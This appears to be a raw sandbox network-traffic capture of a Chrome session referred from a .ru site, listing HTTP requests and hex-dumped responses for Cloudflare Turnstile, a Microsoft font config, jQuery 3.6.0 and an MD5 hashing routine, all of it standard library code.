                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:24 UTC1369INData Raw: 28 7b 5f 64 6f 52 65 73 65 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 2e 5f 68 61 73 68 3d 6e 65 77 20 72 2e 69 6e 69 74 28 5b 31 37 33 32 35 38 34 31 39 33 2c 34 30 32 33 32 33 33 34 31 37 2c 32 35 36 32 33 38 33 31 30 32 2c 32 37 31 37 33 33 38 37 38 5d 29 7d 2c 5f 64 6f 50 72 6f 63 65 73 73 42 6c 6f 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 66 6f 72 28 76 61 72 20 72 3d 30 3b 72 3c 31 36 3b 72 2b 2b 29 7b 76 61 72 20 69 3d 65 2b 72 2c 6e 3d 74 5b 69 5d 3b 74 5b 69 5d 3d 31 36 37 31 31 39 33 35 26 28 6e 3c 3c 38 7c 6e 3e 3e 3e 32 34 29 7c 34 32 37 38 32 35 35 33 36 30 26 28 6e 3c 3c 32 34 7c 6e 3e 3e 3e 38 29 7d 76 61 72 20 6f 3d 74 68 69 73 2e 5f 68 61 73 68 2e 77 6f 72 64 73 2c 73 3d 74 5b 65 2b 30 5d 2c 63 3d 74 5b 65 2b 31 5d 2c 61
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: ({_doReset:function(){this._hash=new r.init([1732584193,4023233417,2562383102,271733878])},_doProcessBlock:function(t,e){for(var r=0;r<16;r++){var i=e+r,n=t[i];t[i]=16711935&(n<<8|n>>>24)|4278255360&(n<<24|n>>>8)}var o=this._hash.words,s=t[e+0],c=t[e+1],a
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:24 UTC1369INData Raw: 62 2c 78 2c 73 2c 31 31 2c 41 5b 34 31 5d 29 2c 78 3d 43 28 78 2c 53 2c 6d 2c 62 2c 68 2c 31 36 2c 41 5b 34 32 5d 29 2c 62 3d 43 28 62 2c 78 2c 53 2c 6d 2c 64 2c 32 33 2c 41 5b 34 33 5d 29 2c 6d 3d 43 28 6d 2c 62 2c 78 2c 53 2c 5f 2c 34 2c 41 5b 34 34 5d 29 2c 53 3d 43 28 53 2c 6d 2c 62 2c 78 2c 67 2c 31 31 2c 41 5b 34 35 5d 29 2c 78 3d 43 28 78 2c 53 2c 6d 2c 62 2c 6b 2c 31 36 2c 41 5b 34 36 5d 29 2c 6d 3d 44 28 6d 2c 62 3d 43 28 62 2c 78 2c 53 2c 6d 2c 61 2c 32 33 2c 41 5b 34 37 5d 29 2c 78 2c 53 2c 73 2c 36 2c 41 5b 34 38 5d 29 2c 53 3d 44 28 53 2c 6d 2c 62 2c 78 2c 75 2c 31 30 2c 41 5b 34 39 5d 29 2c 78 3d 44 28 78 2c 53 2c 6d 2c 62 2c 77 2c 31 35 2c 41 5b 35 30 5d 29 2c 62 3d 44 28 62 2c 78 2c 53 2c 6d 2c 66 2c 32 31 2c 41 5b 35 31 5d 29 2c 6d 3d 44
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: b,x,s,11,A[41]),x=C(x,S,m,b,h,16,A[42]),b=C(b,x,S,m,d,23,A[43]),m=C(m,b,x,S,_,4,A[44]),S=C(S,m,b,x,g,11,A[45]),x=C(x,S,m,b,k,16,A[46]),m=D(m,b=C(b,x,S,m,a,23,A[47]),x,S,s,6,A[48]),S=D(S,m,b,x,u,10,A[49]),x=D(x,S,m,b,w,15,A[50]),b=D(b,x,S,m,f,21,A[51]),m=D


                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    8192.168.2.449749104.18.94.414434464C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:24 UTC648OUTGET /turnstile/v0/api.js?render=explicit HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Host: challenges.cloudflare.com
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Referer: https://hfj.rontishet.ru/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:24 UTC356INHTTP/1.1 302 Found
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Date: Mon, 30 Sep 2024 17:20:24 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    access-control-allow-origin: *
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    cache-control: max-age=300, stale-if-error=10800, stale-while-revalidate=300, public
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    cross-origin-resource-policy: cross-origin
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    location: /turnstile/v0/g/ec4b873d446c/api.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    CF-RAY: 8cb5e228cab0437f-EWR


                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    9192.168.2.44975323.43.61.160443
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:24 UTC239OUTGET /fs/windows/config.json HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Encoding: identity
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Range: bytes=0-2147483646
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    User-Agent: Microsoft BITS/7.8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Host: fs.microsoft.com
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:25 UTC535INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    ApiVersion: Distribute 1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    X-Azure-Ref: 0WwMRYwAAAABe7whxSEuqSJRuLqzPsqCaTE9OMjFFREdFMTcxNQBjZWZjMjU4My1hOWIyLTQ0YTctOTc1NS1iNzZkMTdlMDVmN2Y=
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=257072
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Date: Mon, 30 Sep 2024 17:20:24 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Content-Length: 55
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    X-CID: 2
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:25 UTC55INData Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}


                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    10192.168.2.449751151.101.66.1374434464C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:24 UTC622OUTGET /jquery-3.6.0.min.js HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Host: code.jquery.com
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Referer: https://hfj.rontishet.ru/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:25 UTC613INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Content-Length: 89501
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Content-Type: application/javascript; charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Last-Modified: Fri, 18 Oct 1991 12:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    ETag: "28feccc0-15d9d"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=31536000, stale-while-revalidate=604800
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Via: 1.1 varnish, 1.1 varnish
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Age: 1667795
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Date: Mon, 30 Sep 2024 17:20:25 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    X-Served-By: cache-lga21931-LGA, cache-ewr-kewr1740035-EWR
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    X-Cache: HIT, HIT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    X-Cache-Hits: 5889, 0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    X-Timer: S1727716825.117798,VS0,VE1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:25 UTC1378INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 36 2e 30 20 7c 20 28 63 29 20 4f 70 65 6e 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: /*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQu
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:25 UTC1378INData Raw: 7d 2c 67 65 74 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 3d 3d 65 3f 73 2e 63 61 6c 6c 28 74 68 69 73 29 3a 65 3c 30 3f 74 68 69 73 5b 65 2b 74 68 69 73 2e 6c 65 6e 67 74 68 5d 3a 74 68 69 73 5b 65 5d 7d 2c 70 75 73 68 53 74 61 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 53 2e 6d 65 72 67 65 28 74 68 69 73 2e 63 6f 6e 73 74 72 75 63 74 6f 72 28 29 2c 65 29 3b 72 65 74 75 72 6e 20 74 2e 70 72 65 76 4f 62 6a 65 63 74 3d 74 68 69 73 2c 74 7d 2c 65 61 63 68 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 53 2e 65 61 63 68 28 74 68 69 73 2c 65 29 7d 2c 6d 61 70 3a 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 70 75 73 68 53 74 61 63 6b 28 53 2e 6d 61 70 28 74 68 69 73 2c 66
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: },get:function(e){return null==e?s.call(this):e<0?this[e+this.length]:this[e]},pushStack:function(e){var t=S.merge(this.constructor(),e);return t.prevObject=this,t},each:function(e){return S.each(this,e)},map:function(n){return this.pushStack(S.map(this,f
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:25 UTC1378INData Raw: 6f 6e 28 65 29 7b 76 61 72 20 74 2c 6e 3b 72 65 74 75 72 6e 21 28 21 65 7c 7c 22 5b 6f 62 6a 65 63 74 20 4f 62 6a 65 63 74 5d 22 21 3d 3d 6f 2e 63 61 6c 6c 28 65 29 29 26 26 28 21 28 74 3d 72 28 65 29 29 7c 7c 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 28 6e 3d 76 2e 63 61 6c 6c 28 74 2c 22 63 6f 6e 73 74 72 75 63 74 6f 72 22 29 26 26 74 2e 63 6f 6e 73 74 72 75 63 74 6f 72 29 26 26 61 2e 63 61 6c 6c 28 6e 29 3d 3d 3d 6c 29 7d 2c 69 73 45 6d 70 74 79 4f 62 6a 65 63 74 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3b 66 6f 72 28 74 20 69 6e 20 65 29 72 65 74 75 72 6e 21 31 3b 72 65 74 75 72 6e 21 30 7d 2c 67 6c 6f 62 61 6c 45 76 61 6c 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 62 28 65 2c 7b 6e 6f 6e 63 65 3a 74 26 26 74 2e 6e 6f
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: on(e){var t,n;return!(!e||"[object Object]"!==o.call(e))&&(!(t=r(e))||"function"==typeof(n=v.call(t,"constructor")&&t.constructor)&&a.call(n)===l)},isEmptyObject:function(e){var t;for(t in e)return!1;return!0},globalEval:function(e,t,n){b(e,{nonce:t&&t.no
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:25 UTC1378INData Raw: 5d 2c 71 3d 74 2e 70 6f 70 2c 4c 3d 74 2e 70 75 73 68 2c 48 3d 74 2e 70 75 73 68 2c 4f 3d 74 2e 73 6c 69 63 65 2c 50 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 66 6f 72 28 76 61 72 20 6e 3d 30 2c 72 3d 65 2e 6c 65 6e 67 74 68 3b 6e 3c 72 3b 6e 2b 2b 29 69 66 28 65 5b 6e 5d 3d 3d 3d 74 29 72 65 74 75 72 6e 20 6e 3b 72 65 74 75 72 6e 2d 31 7d 2c 52 3d 22 63 68 65 63 6b 65 64 7c 73 65 6c 65 63 74 65 64 7c 61 73 79 6e 63 7c 61 75 74 6f 66 6f 63 75 73 7c 61 75 74 6f 70 6c 61 79 7c 63 6f 6e 74 72 6f 6c 73 7c 64 65 66 65 72 7c 64 69 73 61 62 6c 65 64 7c 68 69 64 64 65 6e 7c 69 73 6d 61 70 7c 6c 6f 6f 70 7c 6d 75 6c 74 69 70 6c 65 7c 6f 70 65 6e 7c 72 65 61 64 6f 6e 6c 79 7c 72 65 71 75 69 72 65 64 7c 73 63 6f 70 65 64 22 2c 4d 3d 22 5b 5c 5c 78 32 30 5c 5c 74
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: ],q=t.pop,L=t.push,H=t.push,O=t.slice,P=function(e,t){for(var n=0,r=e.length;n<r;n++)if(e[n]===t)return n;return-1},R="checked|selected|async|autofocus|autoplay|controls|defer|disabled|hidden|ismap|loop|multiple|open|readonly|required|scoped",M="[\\x20\\t
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:25 UTC1378INData Raw: 2c 65 65 3d 2f 5b 2b 7e 5d 2f 2c 74 65 3d 6e 65 77 20 52 65 67 45 78 70 28 22 5c 5c 5c 5c 5b 5c 5c 64 61 2d 66 41 2d 46 5d 7b 31 2c 36 7d 22 2b 4d 2b 22 3f 7c 5c 5c 5c 5c 28 5b 5e 5c 5c 72 5c 5c 6e 5c 5c 66 5d 29 22 2c 22 67 22 29 2c 6e 65 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 3d 22 30 78 22 2b 65 2e 73 6c 69 63 65 28 31 29 2d 36 35 35 33 36 3b 72 65 74 75 72 6e 20 74 7c 7c 28 6e 3c 30 3f 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 6e 2b 36 35 35 33 36 29 3a 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 6e 3e 3e 31 30 7c 35 35 32 39 36 2c 31 30 32 33 26 6e 7c 35 36 33 32 30 29 29 7d 2c 72 65 3d 2f 28 5b 5c 30 2d 5c 78 31 66 5c 78 37 66 5d 7c 5e 2d 3f 5c 64 29 7c 5e 2d 24 7c 5b 5e 5c 30 2d 5c 78 31 66 5c
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: ,ee=/[+~]/,te=new RegExp("\\\\[\\da-fA-F]{1,6}"+M+"?|\\\\([^\\r\\n\\f])","g"),ne=function(e,t){var n="0x"+e.slice(1)-65536;return t||(n<0?String.fromCharCode(n+65536):String.fromCharCode(n>>10|55296,1023&n|56320))},re=/([\0-\x1f\x7f]|^-?\d)|^-$|[^\0-\x1f\
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:25 UTC1378INData Raw: 29 29 7b 28 66 3d 65 65 2e 74 65 73 74 28 74 29 26 26 79 65 28 65 2e 70 61 72 65 6e 74 4e 6f 64 65 29 7c 7c 65 29 3d 3d 3d 65 26 26 64 2e 73 63 6f 70 65 7c 7c 28 28 73 3d 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 69 64 22 29 29 3f 73 3d 73 2e 72 65 70 6c 61 63 65 28 72 65 2c 69 65 29 3a 65 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 69 64 22 2c 73 3d 53 29 29 2c 6f 3d 28 6c 3d 68 28 74 29 29 2e 6c 65 6e 67 74 68 3b 77 68 69 6c 65 28 6f 2d 2d 29 6c 5b 6f 5d 3d 28 73 3f 22 23 22 2b 73 3a 22 3a 73 63 6f 70 65 22 29 2b 22 20 22 2b 78 65 28 6c 5b 6f 5d 29 3b 63 3d 6c 2e 6a 6f 69 6e 28 22 2c 22 29 7d 74 72 79 7b 72 65 74 75 72 6e 20 48 2e 61 70 70 6c 79 28 6e 2c 66 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 63 29 29 2c 6e 7d 63 61 74 63 68 28
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: )){(f=ee.test(t)&&ye(e.parentNode)||e)===e&&d.scope||((s=e.getAttribute("id"))?s=s.replace(re,ie):e.setAttribute("id",s=S)),o=(l=h(t)).length;while(o--)l[o]=(s?"#"+s:":scope")+" "+xe(l[o]);c=l.join(",")}try{return H.apply(n,f.querySelectorAll(c)),n}catch(
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:25 UTC1378INData Raw: 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 2c 72 3d 61 28 5b 5d 2c 65 2e 6c 65 6e 67 74 68 2c 6f 29 2c 69 3d 72 2e 6c 65 6e 67 74 68 3b 77 68 69 6c 65 28 69 2d 2d 29 65 5b 6e 3d 72 5b 69 5d 5d 26 26 28 65 5b 6e 5d 3d 21 28 74 5b 6e 5d 3d 65 5b 6e 5d 29 29 7d 29 7d 29 7d 66 75 6e 63 74 69 6f 6e 20 79 65 28 65 29 7b 72 65 74 75 72 6e 20 65 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 65 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 26 26 65 7d 66 6f 72 28 65 20 69 6e 20 64 3d 73 65 2e 73 75 70 70 6f 72 74 3d 7b 7d 2c 69 3d 73 65 2e 69 73 58 4d 4c 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 65 26 26 65 2e 6e 61 6d 65 73 70 61 63 65 55 52 49 2c 6e 3d 65 26 26 28 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: ion(e,t){var n,r=a([],e.length,o),i=r.length;while(i--)e[n=r[i]]&&(e[n]=!(t[n]=e[n]))})})}function ye(e){return e&&"undefined"!=typeof e.getElementsByTagName&&e}for(e in d=se.support={},i=se.isXML=function(e){var t=e&&e.namespaceURI,n=e&&(e.ownerDocument|
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:25 UTC1378INData Raw: 74 69 6f 6e 28 65 29 7b 76 61 72 20 6e 3d 65 2e 72 65 70 6c 61 63 65 28 74 65 2c 6e 65 29 3b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 4e 6f 64 65 26 26 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 4e 6f 64 65 28 22 69 64 22 29 3b 72 65 74 75 72 6e 20 74 26 26 74 2e 76 61 6c 75 65 3d 3d 3d 6e 7d 7d 2c 62 2e 66 69 6e 64 2e 49 44 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 69 66 28 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 26 26 45 29 7b 76 61 72 20 6e 2c 72 2c 69 2c 6f 3d 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 65 29 3b 69 66 28 6f 29 7b 69 66 28 28
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: tion(e){var n=e.replace(te,ne);return function(e){var t="undefined"!=typeof e.getAttributeNode&&e.getAttributeNode("id");return t&&t.value===n}},b.find.ID=function(e,t){if("undefined"!=typeof t.getElementById&&E){var n,r,i,o=t.getElementById(e);if(o){if((
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:25 UTC1378INData Raw: 5b 22 2b 4d 2b 22 2a 6e 61 6d 65 22 2b 4d 2b 22 2a 3d 22 2b 4d 2b 22 2a 28 3f 3a 27 27 7c 5c 22 5c 22 29 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 3a 63 68 65 63 6b 65 64 22 29 2e 6c 65 6e 67 74 68 7c 7c 76 2e 70 75 73 68 28 22 3a 63 68 65 63 6b 65 64 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 61 23 22 2b 53 2b 22 2b 2a 22 29 2e 6c 65 6e 67 74 68 7c 7c 76 2e 70 75 73 68 28 22 2e 23 2e 2b 5b 2b 7e 5d 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 5c 5c 5c 66 22 29 2c 76 2e 70 75 73 68 28 22 5b 5c 5c 72 5c 5c 6e 5c 5c 66 5d 22 29 7d 29 2c 63 65 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 3c 61 20 68 72 65 66 3d 27 27 20 64 69 73 61 62 6c 65 64 3d 27
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: ["+M+"*name"+M+"*="+M+"*(?:''|\"\")"),e.querySelectorAll(":checked").length||v.push(":checked"),e.querySelectorAll("a#"+S+"+*").length||v.push(".#.+[+~]"),e.querySelectorAll("\\\f"),v.push("[\\r\\n\\f]")}),ce(function(e){e.innerHTML="<a href='' disabled='
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:25 UTC1378INData Raw: 65 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 2d 21 74 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 3b 72 65 74 75 72 6e 20 6e 7c 7c 28 31 26 28 6e 3d 28 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 65 29 3d 3d 28 74 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 74 29 3f 65 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 28 74 29 3a 31 29 7c 7c 21 64 2e 73 6f 72 74 44 65 74 61 63 68 65 64 26 26 74 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 28 65 29 3d 3d 3d 6e 3f 65 3d 3d 43 7c 7c 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 3d 3d 70 26 26 79 28 70 2c 65 29 3f 2d 31 3a 74 3d 3d 43 7c 7c 74 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 3d 3d 70
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: e.compareDocumentPosition-!t.compareDocumentPosition;return n||(1&(n=(e.ownerDocument||e)==(t.ownerDocument||t)?e.compareDocumentPosition(t):1)||!d.sortDetached&&t.compareDocumentPosition(e)===n?e==C||e.ownerDocument==p&&y(p,e)?-1:t==C||t.ownerDocument==p


